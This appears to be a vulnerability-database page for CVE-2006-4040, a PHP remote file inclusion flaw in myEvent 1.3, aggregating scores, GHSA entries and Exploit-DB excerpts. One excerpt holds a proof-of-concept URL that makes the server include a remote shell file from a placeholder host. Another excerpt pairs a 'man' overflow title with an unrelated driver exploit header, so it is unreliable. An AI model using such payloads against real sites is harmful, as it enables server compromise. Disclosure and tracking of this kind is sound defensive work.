CVE-2006-4040
published 2006-08-09CVE-2006-4040: PHP remote file inclusion vulnerability in myevent.php in myWebland myEvent 1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.38%
87.3th percentile
PHP remote file inclusion vulnerability in myevent.php in myWebland myEvent 1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the myevent_path parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mywebland | myevent | <= 1.3 | — |
| mywebland | myevent | — | — |
| mywebland | myevent | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-gjv7-29q4-h4w2: PHP remote file inclusion vulnerability in myevent
ghsa_unreviewed·2022-05-01
CVE-2006-4040 [HIGH] GHSA-gjv7-29q4-h4w2: PHP remote file inclusion vulnerability in myevent
PHP remote file inclusion vulnerability in myevent.php in myWebland myEvent 1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the myevent_path parameter.
GHSA
GHSA-8wmr-w5j9-89v2: PHP remote file inclusion vulnerability in viewevent
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-4083 [HIGH] GHSA-8wmr-w5j9-89v2: PHP remote file inclusion vulnerability in viewevent
PHP remote file inclusion vulnerability in viewevent.php in myWebland myEvent 1.x allows remote attackers to execute arbitrary PHP code via a URL in the myevent_path parameter, a different vector than CVE-2006-4040. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
No detection rules found.
Exploit-DB
Man Command - -H Flag Local Buffer Overflow
exploitdb·2007-04-06·CVSS 6.9
CVE-2006-4250 [MEDIUM] Man Command - -H Flag Local Buffer Overflow
Man Command - -H Flag Local Buffer Overflow
---
// source: https://www.securityfocus.com/bid/23355/info
The 'man' command is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation.
NOTE: Presumably, this issue is exploitable only when 'man' has been installed setuid.
Exploiting this issue allows attackers to execute malicious machine code with the privileges of the 'man' utility. This can result in the compromise of affected computers. Failed exploit attempts will likely result in denial-of-service conditions.
PoC Code:
/*
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
* Copyright (C) Daniel Roethlisberger
* Compass Security Network Computing AG, Rapperswil, Switzerla
Exploit-DB
myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion
exploitdb·2006-07-31
CVE-2006-4040 myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion
myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19246/info
myEvent is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
http://www.example.com/myevent.php?myevent_path=http://www.example.com/shell.txt?
No writeups or analysis indexed.
http://secunia.com/advisories/19680http://www.osvdb.org/24725http://www.securityfocus.com/bid/19246http://www.vupen.com/english/advisories/2006/1384https://exchange.xforce.ibmcloud.com/vulnerabilities/28347https://www.exploit-db.com/exploits/2093http://secunia.com/advisories/19680http://www.osvdb.org/24725http://www.securityfocus.com/bid/19246http://www.vupen.com/english/advisories/2006/1384https://exchange.xforce.ibmcloud.com/vulnerabilities/28347https://www.exploit-db.com/exploits/2093
2006-08-09
Published